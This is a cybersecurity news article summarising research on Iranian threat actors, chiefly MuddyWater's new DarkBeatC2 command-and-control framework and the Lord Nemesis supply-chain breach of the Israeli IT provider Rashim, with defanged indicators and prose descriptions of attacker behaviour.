DarkBeatC2

Iranian cyber actors are working together to launch supply-chain attacks using data from earlier breaches and a new C2 framework that MuddyWater might use. 

A lack of technical details has been found in reporting Iranian attacks on Israel.

While local companies and the INCD manage most incident responses, technical details come from external firms like Google; even INCD alerts are vague, providing IOCs without context, which offer limited defense. 

Analysis of leaked Yara rules, though lacking specific details, suggests a connection to wipers used in Iranian cyberattacks as the rules target various systems and align with known wiper deployments by KarMa (linked to DEV-0842/BanishedKitten) against Albanian government institutions in 2022. 

EHA

With DEV-0842 responsible for deploying ransomware and wipers, Microsoft has high confidence that Iranian actors are behind the attack as a whole, which suggests that the Iranian Ministry of Intelligence and Security (MOIS) may have coordinated a multi-group operation.  

Threat actors behind the attack against the Albanian government in 2022

Mandiant found that APT actors used FoxShell webshell, a variant associated with ScarredManticore/DEV-0861/ShroudedSnooper, in the 2022 Albanian government attack, and IOCs shared by INCD included 3 domains, 7 file hashes, and 31 IP addresses. 

One domain was used by DEV-1084 (DarkBit) with MERCURY (MuddyWater) in the Technion attack and 11 IPs were linked to MuddyWater’s past campaigns.

The researchers believed the remaining IPs hosted MuddyWater’s latest tools and C2 framework, “DarkBeatC2.”.  

A supply chain attack by “Lord Nemesis” compromised Rashim, who is an IT provider.

The attacker gained admin access to Rashim’s customer systems and potentially breached their networks through the Michlol CRM VPN by maintaining access for months and exfiltrating data, highlighting the importance of secure credential management by vendors. 

 Updated MuddyWater campaign overview

MuddyWater, a threat actor previously known for minimal changes in tactics, was observed using compromised Israeli email accounts to distribute links to archives containing remote access tools. 

 Uploader information at kinneretacil.egnyte[.]com

The links were hosted on legitimate cloud storage services like Egnyte, with subdomains potentially spoofing Israeli organizations, wheras archives hosted on other platforms with Hebrew filenames suggest targeting of the education sector. 

Uploader information at salary.egnyte[.]com

The activity, along with the timeframe coinciding with another Israeli-targeted attack, raises suspicions of collaboration between Iranian government groups to maximize damage. 

Deep Instinct found a new MuddyWater C2 framework called DarkBeatC2, which uses IP addresses previously linked to MuddyWater campaigns and utilizes PowerShell for communication. 

PowerShell code from “setting” URI.

The actors behind MuddyWater can establish connections to DarkBeatC2 through various means, including manually executing PowerShell code, embedding code within spear phishing emails, or sideloading malicious DLLs. 

It has been analyzed that the communication between infected machines and DarkBeatC2 and that the framework retrieves and executes additional PowerShell scripts. 

One script collects data from a file named “C:\ProgramData\SysInt.log” and sends it to the C2 server; another script loops and fetches content from the C2 server, which might contain instructions for the infected machine. 

MuddyWater has a history of using various open-source tools and remote administration tools in their attacks, as the IP addresses associated with these tools are also linked to malicious activity.

Also Read: NIST Cybersecurity Framework 2.0: First Major Update

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.

LEAVE A REPLY

Please enter your comment!
Please enter your name here